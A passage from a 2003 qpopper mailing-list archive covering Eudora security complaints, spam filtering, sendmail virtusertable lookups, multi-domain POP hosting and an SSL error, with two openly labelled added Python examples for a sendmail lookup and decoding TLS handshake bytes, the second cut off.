> >Allowing users control is still an issue, though.
> >
> >
Date: Mon, 15 Sep 2003 17:07:42 -0400
From: Mike Tancsa <mike at sentex dot net>
Subject: Re: security issues
Thanks,
I have contacted qualcomm as have other paying customers of Eudora
to no effect.
---Mike
At 05:01 PM 15/09/2003, Chuck Yerkes wrote:
>Then call up qualcomm. Recall that the eudora folks don't
>likely work that closely with the popper/opensource folks.
>
>I can grouse to folks in other departments when someone
>doesn't like MY company's products, but I carry little weight
>with them.
>
>A paying customer grousing carries a LOT more weight.
>
>replies back to list please (per the reply-to:)
>
>Quoting Mike Tancsa (mike at sentex dot net):
> > At 12:34 PM 15/09/2003, Daniel Senie wrote:
> > >At 11:50 AM 9/15/2003, Mike Tancsa wrote:
> > >
> > >
> > >>I know this is the qpopper list, but can anyone from qualcomm
> comment on
> > >>the security issues for Eudora ? I find it rather distressing that
> > >>several known holes would be seemingly left unaddressed for so
> > >>long. Perhaps the qualcomm people here can respond on bugtraq where the
> > >>posting below was made.
> > >
> > >This really isn't the right list. I'm getting the distinct impression the
> >
> > I realize that, but I am getting concerned that after a year of no
> response
> > on bugtraq or full disclosure the Eudora engineers are ???? I don't know,
> > don't care ? Are not given the resources to care ? Don't understand ? It
> > would be nice if they said something.
> >
> > ---Mike
Date: Mon, 15 Sep 2003 14:56:48 -0400 (EDT)
From: Alan Brown <alanb at digistar dot com>
Subject: Re: Spam question
On Mon, 15 Sep 2003, Ken Anderson wrote:
> Using SpamAssassin doesn't necessarily mean you are deleting mail.
Indeed, but anyone who does needs to be aware of the consequences of
doing so - and most people using it at MUA level are using it in delete
mode.
Date: Mon, 15 Sep 2003 16:11:05 -0400
From: Mike Tancsa <mike at sentex dot net>
Subject: Re: security issues
At 04:04 PM 15/09/2003, Clifton Royston wrote:
> > I realize that, but I am getting concerned that after a year of no
> response
> > on bugtraq or full disclosure the Eudora engineers are ???? I don't know,
> > don't care ? Are not given the resources to care ? Don't understand ? It
> > would be nice if they said something.
>
> As far as I know, Randy Gellens is the *only* person from Qualcomm on
But he is from qualcomm and perhaps he can at least send a message to the
right people at qualcomm. I don't expect the qpopper people (person) to do
anything. But I would hope he would at least communicate to the appropriate
person just how bad this looks on qualcomm.
---Mike
Date: Mon, 15 Sep 2003 14:38:31 -0400 (EDT)
From: Alan Brown <alanb at digistar dot com>
Subject: Re: Spam question
On Mon, 15 Sep 2003, Daniel Senie wrote:
> We use procmail to deliver to users' mailboxes, and run spamassassin from
> there. As a result, we can enable/disable on a per user basis. Allowing
> users control is still an issue, though.
If you can't run milters, consider Messagewall as a prophylactic
frontend to your mailserver.
www.messagewall.org
Date: Mon, 15 Sep 2003 17:01:23 -0400
From: Chuck Yerkes <chuck+qpopper at yerkes dot com>
Subject: Re: security issues
Then call up Qualcomm. Recall that the Eudora folks don't
likely work that closely with the popper/opensource folks.
I can grouse to folks in other departments when someone
doesn't like MY company's products, but I carry little weight
with them.
A paying customer grousing carries a LOT more weight.
replies back to list please (per the reply-to:)
Quoting Mike Tancsa (mike at sentex dot net):
> At 12:34 PM 15/09/2003, Daniel Senie wrote:
> >At 11:50 AM 9/15/2003, Mike Tancsa wrote:
> >
> >
> >>I know this is the qpopper list, but can anyone from Qualcomm comment on
> >>the security issues for Eudora ? I find it rather distressing that
> >>several known holes would be seemingly left unaddressed for so
> >>long. Perhaps the Qualcomm people here can respond on bugtraq where the
> >>posting below was made.
> >
> >This really isn't the right list. I'm getting the distinct impression the
>
> I realize that, but I am getting concerned that after a year of no response
> on bugtraq or full disclosure the Eudora engineers are ???? I don't know,
> don't care ? Are not given the resources to care ? Don't understand ? It
> would be nice if they said something.
>
> ---Mike
Date: Mon, 15 Sep 2003 10:04:04 -1000
From: Clifton Royston <cliftonr at lava dot net>
Subject: Re: security issues
On Mon, Sep 15, 2003 at 02:24:52PM -0400, Mike Tancsa wrote:
> At 12:34 PM 15/09/2003, Daniel Senie wrote:
> >At 11:50 AM 9/15/2003, Mike Tancsa wrote:
> >>I know this is the qpopper list, but can anyone from Qualcomm comment on
> >>the security issues for Eudora ? I find it rather distressing that
> >>several known holes would be seemingly left unaddressed for so
> >>long. Perhaps the Qualcomm people here can respond on bugtraq where the
> >>posting below was made.
> >
> >This really isn't the right list. I'm getting the distinct impression ...
>
> I realize that, but I am getting concerned that after a year of no response
> on bugtraq or full disclosure the Eudora engineers are ???? I don't know,
> don't care ? Are not given the resources to care ? Don't understand ? It
> would be nice if they said something.
As far as I know, Randy Gellens is the *only* person from Qualcomm on
this list, and I suspect he has to struggle just to get enough free
time to work on qpopper. It's enough work trying to get qpopper
security updates released. It doesn't make sense to try to make him
responsible for Eudora as well; I don't even know if he works on
Eudora.
Conventional channels may not be working to reach the Eudora
engineers, but I doubt this one will work any better - they're just not
going to see it. The only audience you're reaching is other qpopper
users.
You could try the time-honored approach of registering the domain
"eudorasucks.com", putting some content there, and waiting for Qualcomm
corporate management to hear about it and flip out. Apart from that, I
have no suggestions for what would work.
-- Clifton
--
Clifton Royston -- cliftonr at tikitechnologies dot com
Tiki Technologies Lead Programmer/Software Architect
Did you ever fly a kite in bed? Did you ever walk with ten cats on your head?
Did you ever milk this kind of cow? Well we can do it. We know how.
If you never did, you should. These things are fun, and fun is good.
-- Dr. Seuss
Date: Mon, 15 Sep 2003 23:09:40 -0700
From: Kenneth Porter <shiva at sewingwitch dot com>
Subject: Re: Spam question
--On Monday, September 15, 2003 1:17 PM -0400 Alan Brown <alanb at digistar dot com>
wrote:
> I've just been through this problem at $orkplace with a vendor's support
> mailbox silently trashing our mail, resulting in near-cancellation of a
> $100,000 contract. If their spam filters had been rejecting our messages
> we'd at least have known to phone them, instead of assuming we were
> being ignored.
What about your email was triggering their spam detectors? What should the
rest of us avoid?
Date: Mon, 15 Sep 2003 23:15:55 -0700
From: Kenneth Porter <shiva at sewingwitch dot com>
Subject: Re: security issues
--On Monday, September 15, 2003 2:24 PM -0400 Mike Tancsa <mike at sentex dot net>
wrote:
> I realize that, but I am getting concerned that after a year of no response
> on bugtraq or full disclosure the Eudora engineers are ???? I don't know,
> don't care ? Are not given the resources to care ? Don't understand ? It
> would be nice if they said something.
I was looking for a decent IMAP client a year ago and settled on Mulberry
after finding that neither Eudora nor Mozilla were decent IMAP clients. (Moz
didn't handle deeply nested folders well.) Mulberry is not without its quirks,
but I still think I got my $40 worth. The developer is active and a new beta
comes out frequently.
Date: Mon, 15 Sep 2003 14:54:21 -0400 (EDT)
From: Alan Brown <alanb at digistar dot com>
Subject: Re: Spam question
On Mon, 15 Sep 2003, Daniel Senie wrote:
> We can run milters. In this case we don't want to do so. By running SA from
> procmail, we can enable it for those users who want it, and not for those
> who don't. There are no circumstances under which I'd run a proxy product,
> as it would seriously interfere with routine operations.
Messagewall is specifically designed for per-user control. That's why I
recommended it.
There _are_ per-user milter plugins.
The problem is that once you're at procmail level, it's too late: spam
(or false positives) needs to be silently discarded or senders receive
bounce notifications - and large amounts of spam these days is from
forged real addresses, mostly targeting spamfighters who are
understandably getting pretty peeved off at all the bogus bounces.
AB
Date: Tue, 16 Sep 2003 06:23:04 -0400 (EDT)
From: Alan Brown <alanb at digistar dot com>
Subject: Re: Spam question
On Mon, 15 Sep 2003, Kenneth Porter wrote:
> What about your email was triggering their spam detectors? What should the
> rest of us avoid?
Unknown. Even "test message" was getting trashed - in _and_ out.
Date: Tue, 16 Sep 2003 07:39:12 -0700
From: Ken Anderson <ka at pacific dot net>
Subject: Re: Spam question
Alan Brown wrote:
> On Mon, 15 Sep 2003, Kenneth Porter wrote:
>
>
>>What about your email was triggering their spam detectors? What should the
>>rest of us avoid?
>
sysadmins who don't notice...
Ken A
> Unknown. Even "test message" was getting trashed - in _and_ out.
>
>
>
>
Date: Fri, 19 Sep 2003 09:17:42 -0700 (PDT)
From: joe ritter <glestadt4 at yahoo dot com>
Subject: problems with patch and mysql
Hello,
I just applied the mysql-qpopper patch and the compile
went just fine and the popper daemon starts up and
binds to port 110 just fine. However when I attempt to
telnet to port 110 I got the following:
telnet localhost 110
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
Unable to process config file /usr/local/etc/mysql-popper.conf
Connection closed by foreign host.
For the above transcript I started qpopper with the
following command line:
/usr/local/sbin/popper -d -t /usr/local/tmp/debuglog -f /usr/local/etc/mysql-popper.conf
my /usr/local/etc/mysql-popper.conf looks like the
following:
MysqlAuthHost 127.0.0.1
MysqlAuthPort 3306
MysqlUsername xxxxxx
MysqlPassword xxxxxx
MysqlAuthDB qpopper
MysqlAuthTable email
MysqlAuthUsernameField username
MysqlAuthPasswordField password
MysqlAuthPasswordMethod crypt
Configure Line:
./configure --enable-specialauth
--disable-check-pw-max
--enable-fast-update
--prefix=/usr/local
--enable-debugging --enable-mysql
--enable-servermode
--enable-shy
--enable-spool-dir=/var/spool/mail
--enable-log-login-mysql
--withmysqlincludepath=/usr/local/mysql/include/mysql
--enable-standalone
--with-mysqlconfig=/usr/local/etc/mysql-popper.conf
--with-mysqllibpath=/usr/local/mysql/lib/mysql
--with-openssl=/usr/local/ssl
--mandir=/usr/share/man
OS Solaris 5.8 Generic_108528-23 sun4u sparc
SUNW,Ultra-60
Qpopper = qpopper4.0.5
Patch = qpopper-mysql-0.12.patch
Mysql version = 4.0.14
The trace file shows the following after successful
binding:
Sep 19 11:39:24.980 2003 [27628] new child for connection [main.c:923]
Sep 19 11:39:24.980 2003
Sep 19 11:39:24.983 2003 [27628] Trace and Debug destination is file "/usr/local/tmp/debuglog" [pop_init.c:904]
Sep 19 11:39:24.983 2003
Sep 19 11:39:24.983 2003 [27628] Processing config file '/usr/local/etc/mysql-popper.conf'; CallTime=1 [pop_config.c:1354]
Sep 19 11:39:24.983 2003
Sep 19 11:39:24.983 2003 [27628] ...read line 1 (23): MysqlAuthHost 127.0.0.1 [pop_config.c:1390]
Sep 19 11:39:24.983 2003
Sep 19 11:39:24.984 2003 [27628] Expected "set" or "reset", found "MysqlAuthHost" at line 1 of config file /usr/local/etc/mysql-popper.conf [pop_config.c:1414]
Sep 19 11:39:24.984 2003
Sep 19 11:39:24.984 2003 [27628] Finished processing config file '/usr/local/etc/mysql-popper.conf'; rslt=0 [pop_config.c:1538]
Sep 19 11:39:24.984 2003
If any of you could give me any feedback on how to
rectify the problem I would greatly appreciate it.
From: "Alan W. Rateliff, II" <lists at rateliff dot net>
Subject: Interested in writing QPopper patch
Date: Fri, 19 Sep 2003 19:41:48 -0400
I wrote a hook for IMP/Horde which scans through my Sendmail virtuser file
to resolve an email address to a local user name, then use that username to
log into the system.
I would like to write a similar patch for QPopper, but I'm not very
proficient in C, especially with using dbm. Could anyone here offer some
help to get me started?
--
Alan W. Rateliff, II : RATELIFF.NET
Independent Technology Consultant : alan2 at rateliff dot net
(Office) 850/350-0260 : (Mobile) 850/559-0100
-------------------------------------------------------------
[System Administration][IT Consulting][Computer Sales/Repair]
Date: Fri, 19 Sep 2003 21:02:40 -0400
From: Chuck Yerkes <chuck+qpopper at yerkes dot com>
Subject: Re: Interested in writing QPopper patch
Quoting Alan W. Rateliff, II (lists at rateliff dot net):
> I wrote a hook for IMP/Horde which scans through my Sendmail virtuser file
> to resolve an email address to a local user name, then use that username to
> log into the system.
>
> I would like to write a similar patch for QPopper, but I'm not very
> proficient in C, especially with using dbm. Could anyone here offer some
> help to get me started?
DBM is pretty ancient, I've used Berkeley DB for all things
map since 1993 or so.
That said, LDAP is here and solid and very valuable for keeping
maps in. I make a change in LDAP, and 3 MTAs see it right away
(same as with Hesiod when I used that in the early-mid 90s).
LDAP is independent of sendmail and can be queried.
The right and easy answer would be if sendmail used a LIBRARY
for these map lookups (and things like readcf() so you could query
a library routine for, say, the value of Class W or an option
setting or a list of queue directories).
But they don't.
An easy hook, that would be map type independent, would be to write
a rule, say "Scheck_virtusertable" and have it just return the
virtusertable lookup. Nothing within sendmail would call that rule,
so no harm. But YOU could do the C or perl equiv of:
echo "check_virtusertable bob@example dot com" | sendmail -bt
and sendmail would emit the final info.
I snagged from the stanza below Sparse1 (handle virtusers) until the Recurse
line (all one para) into "check_vut" which emits the full email triple
(mailer, host, username).
First, send the input through rule 3:
Scheck_vut
R$* $: $>3 $1 #get focus on domain/normalize
BigBlobOfVirtuserHere
Then it would be just a little work to replace that last line
(recurse) with a "if domain is a virtual domain, call self again"
then clean it up.
Without much testing:
R <$+ @ $={VirtHost} > $+<$+> $> check_vut $1 @ $2
R <$+ @ $+ > $+<$+> $: $1@$2
So
echo "user@example dot com" |sendmail -bt | tail -1
gives me:
check_vut returns: user @ my . realhost . domain
Who calls sendmail ugly :)
It's not pretty, but it's portable enough that virtusertable
can be multiple files, LDAP, db, dbm, HESIOD, SQL, or combinations.
It's what sendmail would get.
Just my $0.04
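An added example, not part of the original post and not sendmail or qpopper code: one way to do the "C or perl equiv" of the `sendmail -bt` lookup from Python, for a login hook that resolves an address to a mailbox. The `check_vut` ruleset name and the "returns:" line come from the post; the function names, the sendmail path, the address whitelist and the sample output are assumptions made here. The address comes from an unauthenticated client and test mode treats every input line as a command, so it is validated first and sent on stdin without a shell.

```python
import re
import subprocess

SENDMAIL = "/usr/sbin/sendmail"   # assumed path; adjust for the local install
RULESET = "check_vut"             # ruleset name used in the post

# Deliberately narrow whitelist (an assumption, stricter than the RFCs):
# no whitespace, control characters, commas, quotes or other characters
# that test mode or a later consumer could interpret.
LOCAL = r"[A-Za-z0-9][A-Za-z0-9._+-]{0,63}"
LABEL = r"[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
ADDRESS_RE = re.compile(LOCAL + "@(?:" + LABEL + r"\.)+[A-Za-z]{2,63}")

# Matches e.g. "check_vut   returns: user @ my . realhost . domain"
RETURNS_RE = re.compile(r"^(?:>\s*)?(\S+)\s+returns:\s*(.*)$")

# Constructed sample of test-mode output, modelled on the line in the post.
SAMPLE_OUTPUT = """\
ADDRESS TEST MODE (ruleset 3 NOT automatically invoked)
Enter <ruleset> <address>
> check_vut          input: user @ example . com
canonify           input: user @ example . com
canonify         returns: user < @ example . com . >
check_vut        returns: user @ my . realhost . domain
> """


def validate_address(addr):
    """Return addr unchanged if it is safe to hand to test mode, else raise."""
    if not isinstance(addr, str) or len(addr) > 254:
        raise ValueError("address rejected")
    # fullmatch, not match() with '$': '$' also matches before a trailing
    # newline, and a newline would start a second test-mode command.
    if ADDRESS_RE.fullmatch(addr) is None:
        raise ValueError("address rejected")
    return addr


def parse_bt_output(output, ruleset=RULESET):
    """Return the final rewrite of `ruleset`, or None if it never returned.

    Test mode prints the address as space-separated tokens; they are
    joined back together. When the ruleset calls itself, the outermost
    (last) "returns:" line is the answer.
    """
    result = None
    for line in output.splitlines():
        m = RETURNS_RE.match(line.strip())
        if m and m.group(1) == ruleset:
            result = "".join(m.group(2).split())
    return result


def resolve(addr, sendmail=SENDMAIL, ruleset=RULESET, timeout=10):
    """Look up addr through sendmail; return the rewritten address or None."""
    addr = validate_address(addr)
    try:
        proc = subprocess.run(
            [sendmail, "-bt"],              # argument list, never a shell string
            input=f"{ruleset} {addr}\n",
            capture_output=True, text=True, timeout=timeout, check=False,
        )
    except (OSError, subprocess.TimeoutExpired):
        return None
    if proc.returncode != 0:
        return None
    resolved = parse_bt_output(proc.stdout, ruleset)
    # The answer becomes a mailbox name, so it gets the same check as the input.
    if resolved is None or ADDRESS_RE.fullmatch(resolved) is None:
        return None
    return resolved


if __name__ == "__main__":
    print(parse_bt_output(SAMPLE_OUTPUT))
```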
Date: Fri, 19 Sep 2003 21:04:19 -0400
From: Chuck Yerkes <chuck+qpopper at yerkes dot com>
Subject: Re: Spam question
Quoting Ken Anderson (ka at pacific dot net):
> Alan Brown wrote:
>
> >On Mon, 15 Sep 2003, Kenneth Porter wrote:
> >
> >
> >>What about your email was triggering their spam detectors? What should the
> >>rest of us avoid?
> >
>
> sysadmins who don't notice...
> Ken A
It can be hard to notice an anomaly when you get 30,000 messages/hour.
Even parsed logs fly by in realtime (see "fromto" for handy tool).
From: "Alan W. Rateliff, II" <lists at rateliff dot net>
Subject: Re: Interested in writing QPopper patch
Date: Sat, 20 Sep 2003 01:11:23 -0400
----- Original Message -----
From: "Chuck Yerkes" <chuck+qpopper at yerkes dot com>
To: "Subscribers of Qpopper" <qpopper at lists.pensive dot org>
Sent: Friday, September 19, 2003 9:02 PM
Subject: Re: Interested in writing QPopper patch
> DBM is pretty ancient, I've used Berkeley DB for all things
> map since 1993 or so.
That's actually what's in use here; dbm is just a genericism.
> That said, LDAP is here and solid and very valuable for keeping
> maps in. I make a change in LDAP, and 3 MTAs see it right away
> (same as with Hesiod when I used that in the early-mid 90s).
[snip]
I'm working in at least three environments that will NEVER be updated to
NIS+ or LDAP. I cannot convince the owners that the time necessary to
centralize the user store is worth the billing, and I'm not apt to do it for
free. Ergo, these environments will remain flat-file with a half-assed
implementation of cron-based replication.
As for my own, I intend to use NIS+. Anything that uses PAM will be able to
use the NIS+ user store. (I'm working in Solaris 8, BTW.) I considered
LDAP, but I've had a complete dog of a time getting LDAP to work properly
(OpenLDAP won't compile, and nothing wants to recognize LDAP libraries that
are supposedly installed already.) I understand Solaris 9 has LDAP
natively, but I'm just building up flight hours for 9, and not in any
production environment.
So in the long run, a central user-store approach is where I will go,
working under PAM so I can utilize NIS+, LDAP, Active Directory, or
whatever. But I need to start somewhere.
--
Alan W. Rateliff, II : RATELIFF.NET
Independent Technology Consultant : alan2 at rateliff dot net
(Office) 850/350-0260 : (Mobile) 850/559-0100
-------------------------------------------------------------
[System Administration][IT Consulting][Computer Sales/Repair]
Date: Sat, 20 Sep 2003 15:14:23 +1000
From: Wayne Heming <wheming at hemnet.com dot au>
Subject: How to setup multiple domain pop server
Does anyone know where I can find a step by step guide to setting up
multiple domains on a single mail server for use with popper
eg
user at domain1.com dot au
user at domain2.com dot au
etc
Wayne
Date: Sat, 20 Sep 2003 13:44:38 -0400
From: Chuck Yerkes <chuck+qpopper at yerkes dot com>
Subject: Re: Interested in writing QPopper patch
Quoting Alan W. Rateliff, II (lists at rateliff dot net):
> ----- Original Message -----
> From: "Chuck Yerkes" <chuck+qpopper at yerkes dot com>
> > That said, LDAP is here and solid and very valuable for keeping
> > maps in. I make a change in LDAP, and 3 MTAs see it right away
> > (same as with Hesiod when I used that in the early-mid 90s).
...
> I'm working in at least three environments that will NEVER be updated to
> NIS+ or LDAP. I cannot convince the owners that the time necessary to
> centralize the user store is worth the billing, and I'm not apt to do it for
> free. Ergo, these environments will remain flat-file with a half-assed
> implementation of cron-based replication.
>
> As for my own, I intend to use NIS+. Anything that uses PAM will be able to
> use the NIS+ user store. (I'm working in Solaris 8, BTW.) I considered
> LDAP, but I've had a complete dog of a time getting LDAP to work properly
> (OpenLDAP won't compile, and nothing wants to recognize LDAP libraries that
> are supposedly installed already.) I understand Solaris 9 has LDAP
> natively, but I'm just building up flight hours for 9, and not in any
> production environment.
>
> So in the long run, a central user-store approach is where I will go,
> working under PAM so I can utilize NIS+, LDAP, Active Directory, or
> whatever. But I need to start somewhere.
Um, NIS+ is a dog. Sun folks run from NIS+.
SUN is moving to LDAP. The ORA LDAP book looked
pretty good for starting with OpenLDAP (getting
the server up is one challenge, doing data well
is another (easier IMHO) one).
It's tough to wrap your brain around. Just like with
DNS many years ago, I had the big "aha" moment with
LDAP when I understood it.
OpenLDAP will work best with db4.1.x (whatever's
current - a lot of perf things have gone into DB4
because of OpenLDAP work).
I'm starting to get it in at a new client. All data will
be in LDAP (incl phone numbers, office info, etc for people
and another OU for machines (serial numbers, processor/OS
info, location, console server info, etc). I'm appalled
at sheets of paper that have info about, say console servers
and you use that to find the right port, but use another paper
for host info, etc.
For NIS only machines (old Solaris 2.6 boxes and some AIX
machines), we can extract from LDAP into NIS maps. There
are NIS servers from PADL that serve NIS info but use LDAP
as its back end.
We've needed a good directory for 10 or more years.
It replaces a billion files for one point of access and management
- from NIS to all sendmail maps to "people use" things like phone
books (Macs will speak LDAP for addressbook and for name servers,
Mozilla will use it for preferences and book marks - you don't care
what machine you're on, you have the info via the network).
Now, if qpopper could do native auth against LDAP for the
non-PAM platforms ...
Subject: Re: How to setup multiple domain pop server
From: Robert Brandtjen <rob at prometheusmedia dot com>
Date: 20 Sep 2003 18:34:12 -0500
On Sat, 2003-09-20 at 00:14, Wayne Heming wrote:
> Does anyone know where I can find a step by step guide to setting up
> multiple domains on a single mail server for use with popper
>
> eg
>
> user at domain1.com dot au
> user at domain2.com dot au
> etc
>
> Wayne
Webmin (http://webmin.com) has a nice GUI utility for the newbie- makes
life very easy and supports several MTA's.
--
Robert Brandtjen <rob at prometheusmedia dot com>
Prometheusmedia
Date: Sun, 21 Sep 2003 11:05:25 +1000
From: Wayne Heming <wheming at hemnet.com dot au>
Subject: Re: How to setup multiple domain pop server
I wouldn't consider myself as a newbie, I already have the MTA (sendmail)
setup for multiple domains, but the generic usernames like "enquiry",
"sales", "orders", "admin" etc are my problem, all the domain owners want
the same usernames.
So what I mean by multiple domains, I need different users with the same
name but different domains on the same pop server.
I did see a few threads a couple of years ago regarding this but have
searched the archives and can't really see a "how-to"
Wayne
At 06:34 PM 20/09/2003 -0500, Robert Brandtjen wrote:
>On Sat, 2003-09-20 at 00:14, Wayne Heming wrote:
> > Does anyone know where I can find a step by step guide to setting up
> > multiple domains on a single mail server for use with popper
> >
> > eg
> >
> > user at domain1.com dot au
> > user at domain2.com dot au
> > etc
> >
> > Wayne
>
>
>Webmin (http://webmin.com) has a nice GUI utility for the newbie- makes
>life very easy and supports several MTA's.
>--
>Robert Brandtjen <rob at prometheusmedia dot com>
>Prometheusmedia
From: "Lisa Casey" <lisa at jellico dot net>
Subject: Re: How to setup multiple domain pop server
Date: Sat, 20 Sep 2003 22:17:33 -0400
Hi,
What MTA do you use? Sendmail? This is a function of your MTA and has
nothing to do with qpopper. See www.sendmail.org and search for virtual
hosting.
Lisa Casey
----- Original Message -----
From: "Wayne Heming" <wheming at hemnet.com dot au>
To: "Subscribers of Qpopper" <qpopper at lists.pensive dot org>
Sent: Saturday, September 20, 2003 9:05 PM
Subject: Re: How to setup multiple domain pop server
> I wouldn't consider myself as a newbie, I already have the MTA (sendmail)
> setup for multiple domains, but the generic usernames like "enquiry",
> "sales", "orders", "admin" etc are my problem, all the domain owners want
> the same usernames.
>
> So what I mean by multiple domains, I need different users with the same
> name but different domains on the same pop server.
>
> I did see a few threads a couple of years ago regarding this but have
> searched the archives and can't really see a "how-to"
>
> Wayne
>
>
>
> At 06:34 PM 20/09/2003 -0500, Robert Brandtjen wrote:
> >On Sat, 2003-09-20 at 00:14, Wayne Heming wrote:
> > > Does anyone know where I can find a step by step guide to setting up
> > > multiple domains on a single mail server for use with popper
> > >
> > > eg
> > >
> > > user at domain1.com dot au
> > > user at domain2.com dot au
> > > etc
> > >
> > > Wayne
Date: Sat, 20 Sep 2003 23:45:22 -0400
From: Joe Maimon <jmaimon at ttec dot com>
Subject: Re: How to setup multiple domain pop server
Might I suggest a policy of usernames/mailboxes: 1 Per Person and
whatever email address they want in their own domain name.
You may dictate the username and password. Why should they care what
their mailbox username is anyways?
You can use the sendmail virtuserdomains and virtusertable to block all
username across domain name bleeding.
Joe
Wayne Heming wrote:
> I wouldn't consider myself as a newbie, I already have the MTA
> (sendmail) setup for multiple domains, but the generic usernames like
> "enquiry", "sales", "orders", "admin" etc are my problem, all the
> domain owners want the same usernames.
>
> So what I mean by multiple domains, I need different users with the
> same name but different domains on the same pop server.
>
> I did see a few threads a couple of years ago regarding this but have
> searched the archives and can't really see a "how-to"
>
> Wayne
>
>
>
> At 06:34 PM 20/09/2003 -0500, Robert Brandtjen wrote:
>
>> On Sat, 2003-09-20 at 00:14, Wayne Heming wrote:
>> > Does anyone know where I can find a step by step guide to setting up
>> > multiple domains on a single mail server for use with popper
>> >
>> > eg
>> >
>> > user at domain1.com dot au
>> > user at domain2.com dot au
>> > etc
>> >
>> > Wayne
>>
>>
>> Webmin (http://webmin.com) has a nice GUI utility for the newbie- makes
>> life very easy and supports several MTA's.
>> --
>> Robert Brandtjen <rob at prometheusmedia dot com>
>> Prometheusmedia
>
>
>
Date: Sun, 21 Sep 2003 12:56:21 +0100
From: Richard Gration <richard at zync.co dot uk>
Subject: Re: How to setup multiple domain pop server
Wayne Heming wrote:
> Does anyone know where I can find a step by step guide to setting up
> multiple domains on a single mail server for use with popper
>
> eg
>
> user at domain1.com dot au
> user at domain2.com dot au
> etc
>
> Wayne
>
Hi there,
I've had a good look for this 2 or 3 times in the last 12 months and
haven't found anything. The basic problem is that qpopper looks up the
POP user in /etc/passwd. You need to find a way to look it up somewhere
else, an LDAP directory or an SQL database being the most likely
solutions, but qpopper doesn't support either of these directly. There
is a PAM module for qpopper, and it can be made to use an LDAP directory
for lookups. I don't know about sendmail, but exim can use LDAP lookup.
This is the official line:
http://www.eudora.com/qpopper/faq.html#password_files
These references provide more hope:
http://lists.debian.org/debian-user/2001/debian-user-200110/msg02452.html
http://web.systhug.com/pam/
Good luck
Rich
Date: Sun, 21 Sep 2003 08:17:45 -0400 (EDT)
From: Alan Brown <alanb at digistar dot com>
Subject: Re: How to setup multiple domain pop server
On Sun, 21 Sep 2003, Richard Gration wrote:
> I've had a good look for this 2 or 3 times in the last 12 months and
> haven't found anything. The basic problem is that qpopper looks up the
> POP user in /etc/passwd. You need to find a way to look it up somewhere
> else, an LDAP directory or an SQL database being the most likely
> solutions, but qpopper doesn't support either of these directly.
There are _hacks_ to do this, but if the original poster wants it, he's
better off moving to a pop3/imap server which can handle it
semi-natively.
Cyrus or Courier being good choices.
People, qpopper is good at what it does (SMALL, SIMPLE(*) server pop3
facilities), but let's keep it that way, rather than trying to turn it
into a marching band.
(*) Emphasis on small and simple. I wouldn't use it past 1500 users, or
for trying to pull half the stunts people are attempting here. If you
want pop3 users to provide user@domain and have mapping, use a server
designed from the ground up for virtual domain facilities.
Date: Sun, 21 Sep 2003 13:39:53 +0100
From: Richard Gration <richard at zync.co dot uk>
Subject: Re: How to setup multiple domain pop server
Alan Brown wrote:
> On Sun, 21 Sep 2003, Richard Gration wrote:
>
>>You need to find a way to look it up somewhere
>>else, an LDAP directory or an SQL database being the most likely
>>solutions, but qpopper doesn't support either of these directly.
>
> There are _hacks_ to do this, but if the original poster wants it, he's
> better off moving to a pop3/imap server which can handle it
> semi-natively.
Fair enough. All I wanted to do was stop the OP from searching usenet
for days. That's what I did before I was convinced that qpopper really
wasn't a good pop daemon for virtual domains. None of the other posts
spoke directly to his original question.
R
Date: Sun, 21 Sep 2003 09:12:47 -0700 (PDT)
From: The Little Prince <thelittleprince at asteroid-b612 dot org>
Subject: Re: How to setup multiple domain pop server
Wayne,
While i agree with Alan's post (parts of it anyway), i still believe in
flexibility when it comes to programs, whether it be through hacks, or
whatever..and giving people what they want, within reason :-)
So if you want to do the virtual domain support, you can use my "hack", as
it was so elegantly put :-)
It pulls users from MySQL, so you'll have to have that, put your users in
it..and then have your MTA support virtual domains also. whether it be a
hack to sendmail, or going with an MTA that has support already in it
(Postfix for example)
My patch for qpopper is at http://www.asteroid-b612.org/software/#qpopper
--Tony
.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-.
Anthony J. Biacco Network Administrator/Engineer
thelittleprince at asteroid-b612.org http://www.asteroid-b612 dot org
"You find magic from your god, and I find magic everywhere"
.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-.
From: "Alan W. Rateliff, II" <lists at rateliff dot net>
Subject: QPOP/SSL vs Outlook Express
Date: Mon, 22 Sep 2003 16:06:17 -0400
Okay, I know I've seen an answer here before, but I wiped out my local
archive thinking a much better, more searchable one was available.
Anyway, I was fortunate enough to receive my secure certificate today and am
trying to get it working in QPopper. My test platform is Outlook Express (I
understand it's the most trouble.) I'm getting these errors:
-ERR Unknown command: "\200l^A^C^A"
Then an EOF error as it closes. I'm assuming my key and certs are
configured correctly since it's not complaining about it anymore.
Help is appreciated.
--
Alan W. Rateliff, II : RATELIFF.NET
Independent Technology Consultant : alan2 at rateliff dot net
(Office) 850/350-0260 : (Mobile) 850/559-0100
-------------------------------------------------------------
[System Administration][IT Consulting][Computer Sales/Repair]
From: "Alan W. Rateliff, II" <lists at rateliff dot net>
Subject: Re: QPOP/SSL vs Outlook Express
Date: Mon, 22 Sep 2003 17:07:57 -0400
----- Original Message -----
From: "Alan W. Rateliff, II" <lists at rateliff dot net>
To: "Subscribers of Qpopper" <qpopper at lists.pensive dot org>
Sent: Monday, September 22, 2003 4:06 PM
Subject: QPOP/SSL vs Outlook Express
> Okay, I know I've seen an answer here before, but I wiped out my local
> archive thinking a much better, more searchable one was available.
>
> Anyway, I was fortunate enough to receive my secure certificate today and am
> trying to get it working in QPopper. My test platform is Outlook Express (I
> understand it's the most trouble.) I'm getting these errors:
>
> -ERR Unknown command: "\200l^A^C^A"
Got it. Randy answered this question a few months ago. The answer was to
set tls-support = alternate-port
in my options file.
--
Alan W. Rateliff, II : RATELIFF.NET
Independent Technology Consultant : alan2 at rateliff dot net
(Office) 850/350-0260 : (Mobile) 850/559-0100
-------------------------------------------------------------
[System Administration][IT Consulting][Computer Sales/Repair]
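An added example, not from the list or from Qpopper: the "command" in the error above is the start of an SSL/TLS ClientHello that reached a listener still expecting plaintext POP3, which is the mismatch `tls-support = alternate-port` removes. The sketch decodes the escaped string and classifies the bytes; the function names, the second and third sample lines, and the assumption that the error text uses `\NNN` octal and `^X` caret escapes are mine.

```python
import re

# (major, minor) version bytes as they appear on the wire.
VERSIONS = {(0, 2): "SSL 2.0", (3, 0): "SSL 3.0", (3, 1): "TLS 1.0",
            (3, 2): "TLS 1.1", (3, 3): "TLS 1.2"}

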